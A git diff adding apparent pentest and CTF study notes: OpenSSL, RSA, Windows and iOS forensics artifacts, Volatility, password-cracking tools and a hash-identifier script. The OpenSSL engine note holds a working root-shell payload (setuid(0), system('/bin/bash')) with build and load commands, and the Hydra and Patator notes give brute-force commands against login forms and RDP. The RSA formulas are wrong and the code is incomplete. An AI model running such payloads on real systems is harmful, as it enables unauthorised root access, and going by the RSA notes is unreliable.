diff --git a/Cryptography/OpenSSL Engine.md b/Cryptography/OpenSSL Engine.md new file mode 100644 index 0000000..98363d9 --- /dev/null +++ b/Cryptography/OpenSSL Engine.md @@ -0,0 +1,44 @@ +# OpenSSL Engine + +* Hook external libs +* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/) + +* Most minimal example +```C +#include + +static int bind(ENGINE *e, const char *id) +{ + return 1; +} + +IMPLEMENT_DYNAMIC_BIND_FN(bind) +IMPLEMENT_DYNAMIC_CHECK_FN() +``` + +* Shell as root +```C +#include +#include + +static int bind(ENGINE *e, const char *id) +{ + setuid(0); + setgid(0); + system("/bin/bash"); +} + +IMPLEMENT_DYNAMIC_BIND_FN(bind) +IMPLEMENT_DYNAMIC_CHECK_FN() +``` + +* Compile +```C +gcc -fPIC -o rootshell.o -c rootshell.c +gcc -shared -o rootshell.so -c -lcrytpo rootshell.o +``` + +* Execute via +```sh +openssl engine -t `pwd`/rootshell.so +``` diff --git a/Cryptography/OpenSSL-Cheatsheet.md b/Cryptography/OpenSSL-Cheatsheet.md new file mode 100644 index 0000000..964d99b --- /dev/null +++ b/Cryptography/OpenSSL-Cheatsheet.md @@ -0,0 +1,23 @@ +# OpenSSL Cheatsheet + +## Extract keys from PFX Cert + +* Key and cert form PFX +```sh +openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes +openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys +``` + +## Extract & Repack PFX Cert + +* Extract & Repack with another password, e.g. from `mimikatz` to `cqure` +```sh +openssl pkcs12 -in *.pfx -out temp.pem -nodes +openssl pkcs12 -export -out *.pfx -in temp.pem +``` + +## Generate Certificate + +```sh +openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes +``` diff --git a/Cryptography/RSA.md b/Cryptography/RSA.md new file mode 100644 index 0000000..66c4f5d --- /dev/null +++ b/Cryptography/RSA.md 
@@ -0,0 +1,36 @@ +# RSA + +* `p * q = n` +* Coprime Phi is calculated either by [Euler Totient](https://en.wikipedia.org/wiki/Euler's_totient_function) or [greatest common divisor](https://en.wikipedia.org/wiki/Greatest_common_divisor) via [euclidean algorithm](https://crypto.stanford.edu/pbc/notes/numbertheory/euclid.html) +* \\(1 < $\phi$ < n \\) +* There is also $\phi$ = (p-1) * (q-1) + +* Encryption, public key `e` is a prime between 2 and phi --> \\( 2 < e < $\phi$ \\) +```python +possible_e = [] +for i in range (2, phi): + if gcd(n, i) == 1 and gcd(phi, i) == 1: + possible_e.append() +``` + +* Decryption, private key `d` --> \\( d * e mod $\phi$ = 1 \\) +```python +possible_d = [] +for i in range (phi + 1, phi + foo): + if i * e mod phi == 1 : + possible_d.append() +``` +* \\( Cipher = msg ** d mod $\phi$ \\) +* \\( Cleartext = cipher ** e mod $\phi$ ) + +## Euklid +```python +def gcd(a, b): + if b == 0: + return a + return gcd(b, a % b) +``` + +## Links + +* [Encryption+Decryption](https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html) diff --git a/Forensics/Kape.md b/Forensics/Kape.md new file mode 100644 index 0000000..d79bf8c --- /dev/null +++ b/Forensics/Kape.md @@ -0,0 +1,23 @@ +# Kroll Artifact Parser + +* Collect and processes artifacts on windows +* Collects from live systems, mounted images and F-response tool + +## Targets + +* Needs source and target directory, as well as a module to process the files on +* `Target` copies a file into a repository +* `*.tkape` files contains metadata of the files to copy +* `Compound Targets` contain metadata of multiple files in order to get a result quicker +* `!Disable` do not appear in the target list +* `!Local` keep on local + + +## Modules + +* Used on the targeted files +* `*.mkape` files +* Additional binaries are kept in `bin` + + + diff --git a/Forensics/NTFS.md b/Forensics/NTFS.md new file mode 100644 index 0000000..6ef15ce --- /dev/null 
+++ b/Forensics/NTFS.md @@ -0,0 +1,48 @@ +# NTFS + +* Has the following advantages over FAT + * Journaling + * ACL + * Volume Shadow Copy + * Alternate Data Stream + +## Master File Table +* VBR references to `$MFT` +* `$LOGFILE` stores transactions of the file system +* `$UsnJrnl` changed files, and reason for change + +## Caching + +* File information is cached for frequent use in +```sh +C:\Windows\Prefetch\*.pf +``` +* An SQLite database can be found under +```sh +C:\Users\\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db +``` + +## Jumplist + +* Stores recently used files of applications inside the taskbar +```sh +C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations +``` + +## Shortcut Files +```sh +C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\ +C:\Users\\AppData\Roaming\Microsoft\Office\Recent\ +``` + +## Internet Explorer History +```sh +C:\Users\\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat +``` + +## Removeable Device Setup Log +```sh +C:\Windows\inf\setupapi.dev.log +``` + + diff --git a/Forensics/OLEtools.md b/Forensics/OLEtools.md new file mode 100644 index 0000000..251843e --- /dev/null +++ b/Forensics/OLEtools.md @@ -0,0 +1,28 @@ +# oletools & Vmonkey + +* Analyze ooxml and ole2 files + +* [oletools repo](https://github.com/decalage2/oletools.git) + +## Usage + +* Check content of a stream +```sh +oledump.py file.doc -Ss +oledump.py file.doc -Ss -v +``` +```sh +oledump.py -i file.doc +``` +```sh +olevba file.doc +``` + +## Vipermonkey +* For the lazy ones +```sh +vmonkey file.doc +``` + +## scdbg +* [scdbg repo](https://github.com/dzzie/SCDBG.git) diff --git a/Forensics/References.md b/Forensics/References.md new file mode 100644 index 0000000..ec7930a --- /dev/null +++ b/Forensics/References.md 
@@ -0,0 +1,7 @@ +## Forensics References + +## Volatility + +[volatility](https://github.com/volatilityfoundation/volatility.git) +[volatility3](https://github.com/volatilityfoundation/volatility3.git) + diff --git a/Forensics/Volatility.md b/Forensics/Volatility.md new file mode 100644 index 0000000..3809f95 --- /dev/null +++ b/Forensics/Volatility.md 
@@ -0,0 +1,91 @@ +# Volatility + +Search through collected volatile memory dumps, volume and VM images. +Volatility and Volatility 3 have a different syntax. The older one has +higher malware hunting abilities. + +* [Cheat sheet](https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf) +* [Hacktricks shee](https://book.hacktricks.xyz/forensics/volatility-examples) +* [Symbol table for Linux and macOS](https://github.com/volatilityfoundation/volatility3#symbol-tables) + +## Basic Commands + +* Basic Info, find OS profile +```sh +volatility -f imageinfo +volatility -f kdbgscan +``` +* Process list +```sh +volatility -f --profile pslist +``` +* List dlls +```sh +volatility -f --profile dlllist -p +``` +* Last accessed dir +```sh +volatility -f --profile shellbags +``` + +### Volatility3 + +* Basic Info works too, but you have to know the kind of OS anyway +```sh +volatility -f windows.info +``` + +* Process list, but processes can be hidden. Therefore use ` psscan ` +```sh +volatility -f windows.pslist +volatility -f windows.psscan +volatility -f windows.pstree +``` + +* List dlls, this includes the path of the file +```sh +volatility -f windows.dlllist +``` + +* Find malicious files, fileless and including files, respectively +```sh +volatility -f windows.malfind +volatility -f windows.vadyarascan +``` + +* Dump memory map +```sh +volatility -f windows.memmap.Memmap --pid --dump +``` + +* Dump and scan files +```sh +windows.dumpfiles.DumpFiles Dumps cached file contents from Windows memory +windows.filescan.FileScan Scans for file objects present in a particular windows. Lists version information from PE files. +``` + +* Find file handles or mutex +```sh +volatility -f windows.mutex +``` + +* Malware hunting through hooking +```sh +windows.ssdt.SSDT Lists the system call table. # System Service Descriptor Table +windows.driverirp.DriverIrp List IRPs for drivers in a particular windows memory image. 
+windows.modules.Modules Lists the loaded kernel modules. +windows.driverscan.DriverScan Scans for drivers present in a particular windows +``` + + +## Plugins + +Volatility 3 plugins are named after the specific profile they are used for. +For the most part these are (` macOS.*, windows.*, linux.* `) + +* For example + * Truecryptpassphrase + * cmdscan, command history + * shutdowntime + + diff --git a/Forensics/Windows Registration.md b/Forensics/Windows Registration.md new file mode 100644 index 0000000..7e141f7 --- /dev/null +++ b/Forensics/Windows Registration.md 
@@ -0,0 +1,119 @@ +# Windows Registry + +## Regedit Keys +* HKEY_CURRENT_USER (HKCU), inside HKU +* HKEY_USERS (HKU) +* HKEY_LOCAL_MACHINE (HKLM) +* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU + * `HKEY_CURREN_USER\Software\Classes` for settings of interactive user + * `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings +* HKEY_CURRENT_CONFIG + +## Paths +* `C:\Windows\System32\Config` + * Default -> `HKEY_USERS\DEFAULT` + * SAM -> `HKEY_LOCAL_MACHINE\SAM` + * SECURITY -> `HKEY_LOCAL_MACHINE\Security` + * SOFTWARE -> `HKEY_LOCAL_MACHINE\Software` + * SYSTEM -> `HKEY_LOCAL_MACHINE\System` + +* `C:\Users\\` + * NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file +* `C:\Users\\AppData\Local\Microsoft\Windows` + * USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file + +* `C:\Windows\AppCompat\Programs\Amcache.hve` + +### Transaction Logs +* Transaction `.LOG` of the registry hive +* Saved inside the same directory which is `C:\Windows\System32\Config`, as the hive which was altered. 
+ +### Backups +* Saved every ten days +* Look out for recently deleted or modified keys +* `C:\Windows\System32\Config\RegBack` + +## Data Acquisition +* Tools + * [Autopsy](https://www.autopsy.com/) + * [FTK Imager](https://www.exterro.com/ftk-imager), does not copy `Amcache.hve` + * [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape), preserves directory tree + * `Registry Viewer` + * `Zimmerman's Registry Explorer`, uses transaction logs as well + * ` AppCompatCache Parser` + * `RegRipper`, cli and gui + +## System Information +* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion` +* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName` +* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation` +* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces` +* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` +* Services -> `SYSTEM\CurrentControlSet\Services` + * Service will start at boot with `start` key value `0x02` +* Users, SAM -> `SAM\Domains\Account\Users` + + +### Control Sets +* `ControlSet001` -> last boot +* `ControlSet002` -> last known good +* `HKLM\SYSTEM\CurrentControlSet` -> live + +* Can be found under: + * `SYSTEM\Select\Current` shows the used control set + * `SYSTEM\Select\LastKnownGood` + +## Autostart Programs +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` +* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce` +* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run` +* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` + +## Recent Files +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. 
xml, pdf, jpg +* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word` +* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU` + +## ShellBags +* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags` +* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags` + +## Last Open/Saved/Visited Dialog MRUs +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU` + +## Explorer Address/Search Bars +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery` + +## User Assist +* GUI applications launched by the user +* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count` + +## Shim Cache +* Application Compatibility, AppCompatCache +* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache` +* Use `AppCompatCacheParser.exe --csv -f -c ` + +### AmCache +* Information about recently run applications on the system +* `C:\Windows\appcompat\Programs\Amcache.hve` +* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\` +* Saves SHA1 of the last executed app + +## Background Activity Monitor/Desktop Activity Moderator BAM/DAM +* Saves full path of executed apps +* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` +* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}` + +## Devices +* Identification + * USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB` +* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices` +* First time connected -> 
`SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064` +* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066` +* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067` + diff --git a/Forensics/iOS.md b/Forensics/iOS.md new file mode 100644 index 0000000..642ba92 --- /dev/null +++ b/Forensics/iOS.md @@ -0,0 +1,32 @@ +# iOS Devices + +## Trust Certificates +* Exchanged between 'Trusted' devices and the charging iOS device. +* iTunes access to the iOS device has elevated permissions using the cert. +* Keychain may be extracted through iTunes. + +## Interesting Files +* `ResetCounter.plist`, hard Reset diagnostic counter +* `com.apple.preferences.datetime.plist` +* DB tables + * Atendee + * Task + * Event +* Mail +* Safari +* Cookies +* Pictures +* Addressbook +* SMS +* Voicemail +* WiFi Keys + +## Backups +Encrypted and unencrypted backups can be chosen in the iTunes menu. + + +## Tools +* [iFunbox](https://www.i-funbox.com/en/page-about-us.html) +* [O.MG cable](https://shop.hak5.org/products/o-mg-cable) + + diff --git a/Hashes/Bruteforce/Patator.md b/Hashes/Bruteforce/Patator.md new file mode 100644 index 0000000..ad1a363 --- /dev/null +++ b/Hashes/Bruteforce/Patator.md 
@@ -0,0 +1,23 @@ +# Patator Bruteforcing + +* [Lanjelot's Repo](https://github.com/lanjelot/patator/) + +## Modules + +* Available modules can be found under `patator --help` +* Module specifics can be found via `patator -h` + +## Using a Module + +* For example `http_fuzz` can be used via +```sh +TARGET_IP=10.0.47.11 +CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2) +SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}') + +echo "The CSRF is: $CSRF" +echo "The PHPSESSID is: $SESSION_ID" + +patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x +``` + diff --git a/Hashes/Haiti.md b/Hashes/Haiti.md new file mode 100644 index 0000000..5af9a7d --- /dev/null +++ b/Hashes/Haiti.md @@ -0,0 +1,6 @@ +# haiti + +* Hash Identifier +```sh +haiti +``` diff --git a/Hashes/Hashcat.md b/Hashes/Hashcat.md new file mode 100644 index 0000000..948a63c --- /dev/null +++ b/Hashes/Hashcat.md @@ -0,0 +1,24 @@ +# Hashcat Utilities + +* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes) + +## Wordlists + +* Combine wordlists +```sh +combinator wordlist.txt otherwordlist.txt > newwordlist.txt +``` + +* Create wordlist +```sh +hashcat --force -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt +``` + +## Using Masks + +* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset +* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack) +* Bruteforcing seven lowerspace characters using `SHA2-384` as an example +```sh +hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l +``` diff --git a/Hashes/Password Cracking/Hydra.md b/Hashes/Password Cracking/Hydra.md new file mode 100644 index 0000000..1902f78 --- /dev/null 
+++ b/Hashes/Password Cracking/Hydra.md @@ -0,0 +1,37 @@ +# Hydra usage + +## Examples + +* HTTP post form +```sh +hydra -l -P MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V +``` +* HTTP basic auth +```sh +hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected +``` + + +|Command|Description| +|-------|-----------| +|`hydra -P -v `|Brute force against a protocol of your choice| +|`hydra -v -V -u -L -P -t 1 -u `|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)| +|`hydra -t 1 -V -f -l -P rdp://`|Attack a Windows Remote Desktop with a password list.| +|`hydra -l -P . $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.| + +## Parameter + +|Option|Decription| +|------|----------| +|-l|Single username| +|-P|Indicates use the following wordlist| +|http-post-form|indicates the method| +|/login url|the login URL| +|:username|the form field where the username is entered| +|^USER^|tells Hydra to use the username from -l| +|password|the formfield where the password is entered| +|^PASS^|tells Hydra to use the wordlist from -P| +|Login|indicates to Hydra the login failed message| +|Login failed|is the login failure message that the form returns| +|F=incorrect|If this word appears on the page, login failed| +|-V| verbose| diff --git a/Hashes/Password Cracking/John the Ripper.md b/Hashes/Password Cracking/John the Ripper.md new file mode 100644 index 0000000..3a51428 --- /dev/null +++ b/Hashes/Password Cracking/John the Ripper.md 
@@ -0,0 +1,43 @@ +# John The Ripper + +* [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats) + +# Usage + +* Example +```sh +john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2 +``` + +## Declaring Structure +* List subformat +```sh +john --list=subformats +``` +```sh +john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2 +``` + +## Rules +* [Rule syntax](https://www.openwall.com/john/doc/RULES.shtml) +* Create a local rules file, e.g. `/etc/john-local.conf` or `/usr/share/john/john-local.conf` +* Create config for mutations, e.g. border mutation +```sh +[List.Rules:border] +$[0-9]$[0-9] +``` +* Run john with parameter `--rules=border` + +### Existing Rules +* `l33t`, l33tsp34k +* `NT`, case mutation +* Example for `best64` +```sh +john --wordlist=single_password.txt --rules=best64 --stdout > out.txt +``` + +### Subformats +* Some salted passwords need dynamic rules +```sh +john --list=subformats +``` diff --git a/Hashes/Password Cracking/VNC.md b/Hashes/Password Cracking/VNC.md new file mode 100644 index 0000000..9903c26 --- /dev/null +++ b/Hashes/Password Cracking/VNC.md @@ -0,0 +1,6 @@ +# VNC Password Decoding + +* Found passwords in vnc config files may be decoded via +```sh + echo -n "" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv +``` diff --git a/Hashes/Password Cracking/sucrack.md b/Hashes/Password Cracking/sucrack.md new file mode 100644 index 0000000..132fba8 --- /dev/null +++ b/Hashes/Password Cracking/sucrack.md @@ -0,0 +1,8 @@ +# sucrack + +* [Repo](https://github.com/hemp3l/sucrack.git) +* Upload to target and build +```sh +sucrack -u -w 100 +``` + diff --git a/Hashes/References.md b/Hashes/References.md new file mode 100644 index 0000000..c13d68f --- /dev/null +++ b/Hashes/References.md 
@@ -0,0 +1,19 @@ +# Hashes References + +## Password and Username Generation + +[exrex](https://github.com/asciimoo/exrex.git) +[namely](https://github.com/OrielOrielOriel/namely.git) + +## Password Cracking + +[Colabcat](https://github.com/someshkar/colabcat.git) + +## Default Passwords + +[default-password](https://default-password.info) +[datarecovery](https://datarecovery.com/rd/default-passwords/) + +## Wordlist Manager + +[wordlistctl](https://github.com/BlackArch/wordlistctl.git) diff --git a/Hashes/Scripts/hash-id.py b/Hashes/Scripts/hash-id.py new file mode 100644 index 0000000..6efb601 --- /dev/null +++ b/Hashes/Scripts/hash-id.py 
@@ -0,0 +1,592 @@ +#!/usr/bin/env python +# encoding: utf-8 +# Hash Identifier +# By Zion3R +# www.Blackploit.com +# Root@Blackploit.com + +from builtins import input +from sys import argv, exit + +version = 1.2 + +logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + +algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", 
"106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", 
"115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + +# hash.islower() minusculas +# hash.isdigit() numerico +# hash.isalpha() letras +# hash.isalnum() alfanumerico + +def CRC16(hash): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") +def CRC16CCITT(hash): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") +def FCS16(hash): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + +def CRC32(hash): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") +def ADLER32(hash): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") +def CRC32B(hash): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") +def XOR32(hash): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + +def GHash323(hash): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") +def GHash325(hash): + hs='85318985' + if len(hash)==len(hs) and 
hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + +def DESUnix(hash): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + +def MD5Half(hash): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") +def MD5Middle(hash): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") +def MySQL(hash): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + +def DomainCachedCredentials(hash): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") +def Haval128(hash): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") +def Haval128HMAC(hash): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") +def MD2(hash): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") +def MD2HMAC(hash): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") +def MD4(hash): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") +def MD4HMAC(hash): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and 
